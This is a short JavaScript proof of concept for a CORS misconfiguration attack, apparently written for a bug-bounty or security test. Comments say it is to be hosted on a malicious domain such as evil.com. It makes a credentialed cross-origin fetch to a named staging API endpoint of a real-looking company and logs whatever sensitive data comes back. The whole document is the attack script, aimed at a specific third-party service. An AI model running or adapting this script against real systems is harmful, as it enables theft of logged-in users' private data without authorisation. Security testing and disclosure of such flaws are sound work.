// This script would be hosted on your malicious domain (e.g., evil.com)

fetch('https://api.stg.inspectorio.com/some/sensitive/endpoint', {
    method: 'GET',
    mode: 'cors',
    credentials: 'include' // This is the magic part
})
.then(response => response.json())
.then(data => {
    // If the vulnerability exists, you will be able to read the data here
    console.log('Successfully received sensitive data:', data);
})
.catch(error => {
    // If there's a problem, you'll see a CORS error in the console
    console.error('Error:', error);
});